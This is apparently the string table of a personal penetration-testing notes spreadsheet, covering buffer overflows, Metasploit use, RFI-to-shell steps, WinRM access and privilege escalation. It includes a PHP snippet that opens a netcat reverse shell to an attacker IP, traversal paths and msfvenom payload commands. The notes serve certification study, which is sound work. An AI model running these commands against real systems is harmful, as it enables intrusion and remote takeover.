    <t xml:space="preserve">sudo pip3 install impacket &amp;&amp; sudo pip3 install ~/tools/impacket/ &amp;&amp; sudo pip3 install kerberos &amp;&amp; sudo pip3 install -r ~/tools/AutoRecon/requirements.txt &amp;&amp; sudo pip2 install future
</t>
  </si>
  <si>
    <t>cd ~/tools/rdpscan &amp;&amp; make
sudo cp ~/tools/rdpscan/rdpscan /usr/bin</t>
  </si>
  <si>
    <t>Miscellaneous</t>
  </si>
  <si>
    <t>Ensure that your SSH service has the appropriate algorithms to work with plink.exe:
sudo su
echo HostKeyAlgorithms ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss &gt;&gt; /etc/ssh/sshd_config
echo KexAlgorithms ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha256 &gt;&gt; /etc/ssh/sshd_config</t>
  </si>
  <si>
    <t xml:space="preserve">sudo updatedb
</t>
  </si>
  <si>
    <t xml:space="preserve">sudo nano /etc/php/7.3/cli/php.ini and change:
upload_max_filesize = 100M
post_max_size = 100M
max_input_time = 600
max_execution_time = 600
This is so you can transfer larger files OFF windows machines through the built in PHP webserver. Trust me, it's a lifesaver.
</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure terminator is set to infinite scrolling
</t>
  </si>
  <si>
    <t>Logging</t>
  </si>
  <si>
    <t xml:space="preserve">Awesome command logging (log like a lumberjack): 
mkdir ~/logs and write the following into /bashrc:
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)”
</t>
  </si>
  <si>
    <t xml:space="preserve">Setup github environment
git config --global user.email &lt;email&gt;
git config --global user.name "&lt;username&gt;"
</t>
  </si>
  <si>
    <t xml:space="preserve">To push back to your git repositories:
git add .
git commit -m "Adding notes - popped root on Alice"
git push origin master
</t>
  </si>
  <si>
    <t>21 - FTP</t>
  </si>
  <si>
    <t>3306 - MySQL</t>
  </si>
  <si>
    <t>List for importing</t>
  </si>
  <si>
    <t>23 - Telnet</t>
  </si>
  <si>
    <t>5800 / 5900 - VNC</t>
  </si>
  <si>
    <t>25 - SMTP</t>
  </si>
  <si>
    <t>5985 / 47001 - WinRM</t>
  </si>
  <si>
    <t>Active Directory</t>
  </si>
  <si>
    <t>79 - Finger</t>
  </si>
  <si>
    <t>Bash tools</t>
  </si>
  <si>
    <t>80 / 443 - HTTP</t>
  </si>
  <si>
    <t>Basic use</t>
  </si>
  <si>
    <t>88 / 464 - Kerberos</t>
  </si>
  <si>
    <t>File transfer</t>
  </si>
  <si>
    <t>110 / 143 / 993 / 995 - pop3(s)/imap(s)</t>
  </si>
  <si>
    <t>Hash cracking</t>
  </si>
  <si>
    <t>Local enumeration / privesc</t>
  </si>
  <si>
    <t>123 - NTP</t>
  </si>
  <si>
    <t>Notes and lists</t>
  </si>
  <si>
    <t>135 / 136 - MSRPC</t>
  </si>
  <si>
    <t>139 / 445 - SMB</t>
  </si>
  <si>
    <t>161 / 162 - SNMP</t>
  </si>
  <si>
    <t>Recon</t>
  </si>
  <si>
    <t>389 / 636 - LDAP</t>
  </si>
  <si>
    <t>Shell upgrade</t>
  </si>
  <si>
    <t>1433 - MSSQL</t>
  </si>
  <si>
    <t>Webapp</t>
  </si>
  <si>
    <t>2049 - NFS</t>
  </si>
  <si>
    <t>In order to have the 'Category' slider on the commands page display correctly</t>
  </si>
  <si>
    <t>we need to use a 'Custom List' in Excel to arrange them.</t>
  </si>
  <si>
    <t xml:space="preserve">Custom lists are the things that allow excel to sort 'JAN,FEB,MAR' etc even though </t>
  </si>
  <si>
    <t xml:space="preserve">they're not alphabetical. So these items need to be EXACTLY the same as the slider, </t>
  </si>
  <si>
    <t xml:space="preserve">otherwise it won't work. As excel orders them left to right, if you have an odd </t>
  </si>
  <si>
    <t>number you'll need the blank file to be on the right column.</t>
  </si>
  <si>
    <t>Use the above area to arrange the category buttons how you would like them to be,</t>
  </si>
  <si>
    <t>then copy the vertical list on the right into notepad (without the zeros), then copy it again, and go to:</t>
  </si>
  <si>
    <t>File &gt; Options &gt; Advanced &gt; Edit Custom Lists (at the bottom) and add the</t>
  </si>
  <si>
    <t>list as a new list. (NEW LIST, paste entries, click Add).</t>
  </si>
  <si>
    <t>Then go back to the Commands page and sort the 'Category' slider Z -&gt; A, then</t>
  </si>
  <si>
    <t>A -&gt; Z to trigger the custom list.</t>
  </si>
  <si>
    <t>This is the best solution I've found so far.</t>
  </si>
  <si>
    <t>https://www.notion.so/Notes-Wiki-2d9b2ae5089b4c0e903c0295abff5785</t>
  </si>
  <si>
    <t>https://www.notion.so/Poor-mans-pentest-notes-ab298571d9d4466db1971cf78ac6f840</t>
  </si>
  <si>
    <t xml:space="preserve">books.hacktricks.xyz/pentesting-methodology </t>
  </si>
  <si>
    <t>To find on a windows Microsoft IIS server, try 
../../../windows/win.ini
../../../boot.ini</t>
  </si>
  <si>
    <t>Start an smb server on kali linux</t>
  </si>
  <si>
    <t>sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py root .
On windows:
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe</t>
  </si>
  <si>
    <t>Browser Autopwn</t>
  </si>
  <si>
    <t xml:space="preserve">If we come across a machine which is running a vulnerable browser i.e. Java 1.6.0 and below, we can host a browser autopwn server and get them to click on the URL link that the autopwn metasploit gives us. </t>
  </si>
  <si>
    <t xml:space="preserve">1. use auxiliary/server/browser_autopwn or use/exploit/multi/browser/java_rhino (or other module)
2. set LHOST and SRVHOST to us
3. Add the link to the webpage source code i.e. index.php and upload to the web root (var/www (linux) or inetpub\wwwroot (windows))
4. Wait for person to click on index.php -&gt; meterpreter session will spawn in our cmd
</t>
  </si>
  <si>
    <t>Find hosts via Wireshare sniffing</t>
  </si>
  <si>
    <t xml:space="preserve">meterpreter &gt; use sniffer
&gt; sniffer_interfaces
&gt; sniffer_start &lt;interface_number i.e. 2&gt;
after a while run the below dump to dump the network traffic
&gt; sniffer_dump 2 &lt;location to save&gt;
&gt; sniffer_stop 2
wireshark &lt;pcap save&gt;
Analyse the endpoints -&gt; statistics -&gt; endpoints
We can find new devices in the network this way even if our nmap or msf port scanner does not pick up devices. </t>
  </si>
  <si>
    <t xml:space="preserve">We can use sniffer meterpreter module to find out what internal machines are trying to connect to in the network. 
For example, if our nmap/ msf scanner does not pick up any ports on the internal machines, they still may be connecting to services such as websites (websites that are outdated). We can review the response from the website and see if the client (internal connecting machine) is vulnerable. </t>
  </si>
  <si>
    <t>Windows LFI</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">https://null-byte.wonderhowto.com/how-to/exploit-remote-file-inclusion-get-shell-0187006/
https://www.yeahhub.com/from-rfi-to-meterpreter-shell/
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>IF OUR SHELL DIES RELATIVELY QUICKLY, CREATE AN MSFVENOM PAYLOAD REVERSE TCP AND UPLOAD TO WEBSERVER QUICKLY. 
THEN NAVIGATE TO THE PAYLOAD U UPLOADED. ENSURE THE PAYLOAD IS. THEN RUN THE MSF PAYLOAD FROM THE PHP BASH SHELL AND WE GET A METERPRETER SHELL. SIICK</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
https://github.com/Dhayalanb/windows-php-reverse-shell
USE THE ABOVE SHELL IF IT IS AN IIS/WINDOWS SERVER, 
IF LINUX BOX JUST USE THE SHELL IN THE SCRIPT. </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Find a path traversal vuln
2. Test with google for RFI
3. Host a python server with the php shell
4. Include the attacker server in the url and execute.
5. Upload a msfvenom payload using nc or msf and run to get a proper shell on the webserver. 
Shell process:
1. Upload a txt shell hosted on the attacker machine
2. Create a bash script via the below:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Inside the php script:
&lt;?php
  echo shell_exec('echo "nc &lt;attacker_ip&gt; &lt;attacker listening port&gt; -e /bin/bash" &gt; bashscript.sh');
  echo shell_exec('chmod 777 bashscript.sh);
  echo shell_exec('./bashscript.sh');
?&gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">3. Setup a nc listener on the attacker machine
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">nc -nlvp 4445 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>4. Load the RFI on the victim website. 
5. Got a shell
6. Upload msf payload to get a meterpreter shell via setting up an smb server (REFER TO FILE TRANSFER SECTION) on attacker machine and copying the file from our attacker to the victim in the php shell. 
OR we can just do the php get cmd shell as a txt file and it will work</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>icacls</t>
  </si>
  <si>
    <t>icacls . shows permissions of a directory u are in</t>
  </si>
  <si>
    <t>https://superuser.com/questions/322423/explain-the-output-of-icacls-exe-line-by-line-item-by-item</t>
  </si>
  <si>
    <t>Setup a netcat listener/ handler
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
https://www.varonis.com/blog/netcat-commands/</t>
  </si>
  <si>
    <t>Guides</t>
  </si>
  <si>
    <t>https://sushant747.gitbooks.io/total-oscp-guide/content/reverse-shell.html</t>
  </si>
  <si>
    <t>https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We want to overwrite the EIP to jump to </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">CALL ESP or JMP ESP as these are fixed areas in memory. </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We can use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">findjmp2 </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">to find the jmp address.  </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">We cannot write hexadecimal values into our command prompt, therefore we have to edit the program directly and add our shellcode in. </t>
  </si>
  <si>
    <t>https://community.elearnsecurity.com/topic/9845-buffer-overflow/?tab=comments#comment-42786</t>
  </si>
  <si>
    <t>Buffer Overflow Process</t>
  </si>
  <si>
    <t>https://nullsweep.com/pivot-cheatsheet-for-pentesters/
https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/meterpreter/
https://multiplex3r.github.io/posts/2016-10-14-pivoting-with-meterpreter-and-reverse-port-forwards/</t>
  </si>
  <si>
    <t>https://community.elearnsecurity.com/topic/5810-32bitftp-buffer-overflow-on-windows-7-sp1/</t>
  </si>
  <si>
    <t>https://community.elearnsecurity.com/topic/5427-32bitftp-shellcode/</t>
  </si>
  <si>
    <t>https://medium.com/@codingkarma/free-float-ftp-pop-calc-exe-via-stack-overflow-3be11ce23570 (THIS ONE GIVES US A SHELL)</t>
  </si>
  <si>
    <t>https://blackwintersecurity.com/oscp/</t>
  </si>
  <si>
    <t>We know we can reliably overwrite the Saved Return Pointer with a specific value (and hence gain control of EIP) • WecansetEIPtotheaddressofa"JMP ESP"gadgettoredirectexecution flow to some bytecode we have put on the stack • We can cause Remote Code Execution of some "INT 3" instructions</t>
  </si>
  <si>
    <t>Examine a binary to determine some locations of interest; • Explore function CALL/RETurn mechanics in a debugger and understand how they work; • Trigger a simple Stack Buffer Overflow bug with a bunch of A’s; • Discover the offset to a Saved Return Pointer with pattern_create.rb and "!mona findmsp"; • Confirm the discovered offset and gain tight EIP control; • Put stuff at a location that ESP points to at the time of the return to the overwritten Saved Return Pointer; • Reason about and check for bad characters; • Find a "JMP ESP" gadget; • Generate calc-popping shellcode; • Use EIP control and a "JMP ESP" gadget to cause execution of calcpopping shellcode, being mindful of the decoder stub’s GetPC routine</t>
  </si>
  <si>
    <t xml:space="preserve">meterpreter &gt; run post/windows/manage/migrate </t>
  </si>
  <si>
    <t>DO THIS STRAIGHT AFTER GETTING BOF OR ANY OTHER REMOTE CODE EXEC</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Run the meterpreter script </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">run getgui -e (enables rdp) 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>2. Grant the target user/ creds privileges to use RDP -&gt; add to the RDP Users group. Via the shell:
n</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">et localgroup "Remote Desktop Users" &lt;user_name&gt; /add
net localgroup "Remote Desktop Users" -&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> to check the members of the rdp group
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>xfreerdp /u:&lt;username&gt; /v:&lt;ip&gt;:3389</t>
    </r>
  </si>
  <si>
    <t>Try these below boxes for bof practice</t>
  </si>
  <si>
    <t>https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/</t>
  </si>
  <si>
    <t>https://www.reddit.com/r/oscp/comments/c698qx/what_do_you_do_when_your_bof_shellcode_does_not/</t>
  </si>
  <si>
    <t>Step Name</t>
  </si>
  <si>
    <t xml:space="preserve">Use the python script and modify parameters. </t>
  </si>
  <si>
    <t xml:space="preserve">1. Copy the application source code and compile. Load the app into Immunity. 
2. Find all inputs in the application.
3. Attempt BoF via sending multiple A strings. We may have to encode these A values. Send up to 20k characters. 
4. Find the input which crashes the application. 
5. Check that the EIP value in Immunity has been overwritten by 41414141 (AAAA)
</t>
  </si>
  <si>
    <t>Discover Offsets/ Junk Bytes</t>
  </si>
  <si>
    <t>Confirm Offset/ Junk Bytes</t>
  </si>
  <si>
    <t xml:space="preserve">We need to confirm the number of junk bytes is correct. 
Refer to the DoGood manual for a python script example. 
If our EIP is followed by CCCCDDDD, then we know the offset is correct. </t>
  </si>
  <si>
    <t>Bad Characters</t>
  </si>
  <si>
    <t>Find JMP point</t>
  </si>
  <si>
    <t>Pop calc</t>
  </si>
  <si>
    <t>Other payloads</t>
  </si>
  <si>
    <t xml:space="preserve">Once we get calc we can easily get a remote shell etc.
Use msfvenom windows/meterpreter/reverse_tcp and set up a msf multi handler using the same payload. </t>
  </si>
  <si>
    <t>Spiking</t>
  </si>
  <si>
    <t>Pretty much the same as fuzzing XD</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We want to find the number of bytes it takes to hit the point where the app crashes and we get the AAAA EIP. 
1. Run the below to create a pattern payload:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">2. Enter the output payload into our script/ input method.
3. Once the application crashes, copy the EIP value into the below script:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q &lt;new EIP value&gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">This will give us the offset length. 
OR 
We can use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">!mona findmsp 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">OR
Sometimes the above two methods may not work. We can use pwn tools on python 3 to find the number of junk bytes. 
1. pwn cyclic -a "123456789ABCDEF" 4000 (number of bytes)
2. Put this output of 4000 cyclical bytes into the python script
3. Run script
4. Grab EIP value
5. Use the end 4 bytes from the EIP and add to below pwn script:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">pwn cyclic -a 123456789ABCDEF -l 7A13 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Run and get the junk bytes value. </t>
    </r>
  </si>
  <si>
    <t>Egg hunter example</t>
  </si>
  <si>
    <t>https://captmeelo.com/exploitdev/osceprep/2018/06/29/vulnserver-kstet.html</t>
  </si>
  <si>
    <t>A*100000 -&gt; Junk
BBBB -&gt; ESP
badcharactertest -&gt; test for badchar
D -&gt; padding</t>
  </si>
  <si>
    <t>Check tryhack me bufferoverflowprep for examples -&gt; good for badchars</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Whenever we want to exploit BoF we need to generate shellcode using msfvenom or veil:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">msfvenom -p windows/exec -b '&lt;badchars i.e. '\x00\x0A'&gt;' -f python --var-name payload CMD=calc.exe EXITFUNC=thread
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. Copy and paste the shellcode into our script. 
2. Add our NOP sled. Add \x90\'s right before our payload.
OR
Do it the right way:
1. Run 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">/usr/share/metasploit-framework/tools/exploit/metasm_shell.rb
&gt; sub esp, 0x10 -&gt; 10 is the amount we want to push the ESP up toward lower addresses
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>2. Add the output (should be "\x83\xec\x10" to the top of our payload. 
*Ensure that the hexadecimal is divisible by 4 i.e. 0.10 is 16 which is divisible by 4</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">In order for our payload to work, we need to remove all bad chars which may affect code exec. 
1. Refer to the python script in DoGood and save the binary file.
2. Use the below mona script to see which bad chars are present:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">!mona cmp -a esp -f &lt;binaryfilelocation&gt; 
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Check the immunity logs, it will tell us if the shellcode is good or what bad chars are still presents
4. READING THE LOGS: Read the pop up windows and bad chars will be shown.
*Corrupted bytes often corrupt the bytes next to it. i.e if 41, 42, 43 are shown, the bad character is 42!
*If there are only two characters i.e. 11 and 12, the bad char is the first one (11). ee, ef -&gt; ee
*The first byte is always correct
*There should never be a lot of bad chars
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Ensure that no bad chars exist anywhere in the payload, including the JMP address. </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We need to 'bounce' off a JMP or CALL to static memory to run our payload. Use the below script to find the JMP/CALL point:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">!mona jmp -r esp -cpb "&lt;our bad chars in hex i.e. \x00\x0A" -kernel (optional -m * for all modules if bad chars are present)
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>2. Go to the logs and there should be a jmp address(es). 
3. Add this address to our python input script in little endian format. This is entered before our payload. 
i.e. "\xFE\xCA\x00"</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">To find what port the service is running on -&gt; cmd line = netstat -ab, aon or ano
Start the service, rerun the netstat command, and see what new service is showing. This is the port it is using. 
We need to find what part of the app is vulnerable. 
1. Use GenericTCP:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">generic_send_tcp &lt;host&gt; &lt;port&gt; &lt;spike script
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">2. Develop spikescript 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">s_readline();
s_string("&lt;what we want to test i.e. STATS, TRUN"); i.e s_string("STATS ");
s_string_variable("0");
--&gt; save as &lt;xyz&gt;.spk
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">3. Check the EAX when the program crashes for the correct syntax to send in the payload. ie. the payload may require only TRUN from the command line, but in immunity it may say 'TRUN /.:/AAAAA' meaning we have to include the /.:/ characters in our python payload. 
4. Sometimes the program will only accept raw bytes and not HEX. Check out John Hammonds HTER Vulnserver video for an example. </t>
    </r>
  </si>
  <si>
    <t>Hashcat</t>
  </si>
  <si>
    <t>Hashcat can be used to crack hashes</t>
  </si>
  <si>
    <t xml:space="preserve">hashid </t>
  </si>
  <si>
    <t>hashid &lt;has&gt;</t>
  </si>
  <si>
    <t>Hash id is used to identify what type a hash is</t>
  </si>
  <si>
    <t>hashcat -m 100 &lt;hash file pash i.e. Cat.hash&gt; &lt;wordlist i.e. Rockyou&gt; --force</t>
  </si>
  <si>
    <t>WebDAV</t>
  </si>
  <si>
    <t>nmap --script=http-webdav-scan</t>
  </si>
  <si>
    <t xml:space="preserve">We are able to exploit webdav with a number of metasploit modules. </t>
  </si>
  <si>
    <t>davtest</t>
  </si>
  <si>
    <t>davtest -url &lt;URL&gt; (ensure u put http at the front of url)</t>
  </si>
  <si>
    <t xml:space="preserve">We can use davtest to test file permissions. Check nullbyte for a good tutorial. </t>
  </si>
  <si>
    <t>cadaver</t>
  </si>
  <si>
    <t>Use cadaver to upload files to webdav</t>
  </si>
  <si>
    <t>use exploit/windows/iis/iis_webdav_upload
Converts a txt to asp (asp can then execute on webdav...)</t>
  </si>
  <si>
    <t>Windows Exploit Suggester</t>
  </si>
  <si>
    <t>https://github.com/AonCyberLabs/Windows-Exploit-Suggester</t>
  </si>
  <si>
    <t xml:space="preserve">Use for priv esc, exploit, etc. 
Go through each one and try, some may not work at all. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">We can use gobuster to brute force directories, find gci files etc. Run this when you come across an app. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Dirbuster dir -u "&lt;target_url&gt;" -w &lt;wordlist from /usr/share/wordlists&gt; -x &lt;file extension i.e. Sh,pl,php&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Find if a CGI file or any file in the /cgi-bin/ is vulnerable to shellshock. </t>
  </si>
  <si>
    <t>Web Exploit</t>
  </si>
  <si>
    <t>msf &gt; use exploit/multi/http/apache_mod_cgi_bash_env_exec</t>
  </si>
  <si>
    <t>If we find a file in the /cgi-bin/ we can use this module to get a shell.
Set the TARGET URI as the path to the actual file
set the URIPATH as /</t>
  </si>
  <si>
    <t>Also, try and use other types of payloads i.e. Normal tcp reverse not meterpreter if the shell dies. It may be an issue with the payload...</t>
  </si>
  <si>
    <t>Evil-WinRM</t>
  </si>
  <si>
    <t>Evil-WinRm</t>
  </si>
  <si>
    <t>5985,5986 - WinRM</t>
  </si>
  <si>
    <t>1. gem install evil-winrm
2. evil-winrm -u &lt;username&gt; -p '&lt;passwordsmb&gt;' -i &lt;ip or domain name&gt; 
3. Shell</t>
  </si>
  <si>
    <t>dir -force</t>
  </si>
  <si>
    <t xml:space="preserve">use dir -force to list hidden directories in windows. </t>
  </si>
  <si>
    <t>If ports 5985/6 are open, and we have valid SMB credentials, we can use Winrm to get a shell. 
Checkout hacktricks.xyz for an example. 
Can be used on any port that has WinRM available/ serving. 
https://github.com/Hackplayers/evil-winrm</t>
  </si>
  <si>
    <t xml:space="preserve">DLL Hijacking allows us to abuse the way that executables when launched search for Dynamic Link Libraries. This is known as the DLL search order. 
We can use DLL hijacking to escalate our privileges or maintain access to a system. 
Slide 6.2.2.5 DLL for PTP.
Tools:
- process monitor -&gt; https://docs.microsoft.com/en-us/sysinternals/downloads -&gt; look for the sys internal suite
- process explorer (also in sysinternalsuite)
GROUPS VULNERABLE TO DLL INJECTION
Some Windows Groups are vulnerable to DLL hijacking. If your current user is a part of the below groups (via the net groups command), then we can do dll hijacking:
- DnsAdmins (https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise)
</t>
  </si>
  <si>
    <t>https://www.ired.team/</t>
  </si>
  <si>
    <t>Good for windows</t>
  </si>
  <si>
    <t>blackwintersecurity.com - OSCP guide/ priv esc helper</t>
  </si>
  <si>
    <t>Cold Fusion</t>
  </si>
  <si>
    <t>Abode Cold Fusion</t>
  </si>
  <si>
    <t>https://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html
https://pentest.tonyng.net/attacking-adobe-coldfusion/</t>
  </si>
  <si>
    <t>Subject to LFI and read admin password</t>
  </si>
  <si>
    <t>metasploit &gt; sessions -u &lt;session u wanna upgrade&gt;</t>
  </si>
  <si>
    <t>https://blog.pentesteracademy.com/socks4-proxy-pivoting-by-metasploit-74436b45392a</t>
  </si>
  <si>
    <t>Enumeration Cheat sheet</t>
  </si>
  <si>
    <t>http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html</t>
  </si>
  <si>
    <t>https://book.hacktricks.xyz/pentesting/135-penstesting-msrpc</t>
  </si>
  <si>
    <t>ippsec.rocks</t>
  </si>
  <si>
    <t>gtfo.bi</t>
  </si>
  <si>
    <t>gtfo.bins</t>
  </si>
  <si>
    <t>Check ptp slides</t>
  </si>
  <si>
    <t>Sniffing &amp; MiTM (Do once we have access to the internal network)</t>
  </si>
  <si>
    <t>Webapp pentesting</t>
  </si>
  <si>
    <t>SQL cheat sheets</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Method 2:
Sometimes the first method may not work. 
1. See if /var/log/apache2/access.log is available
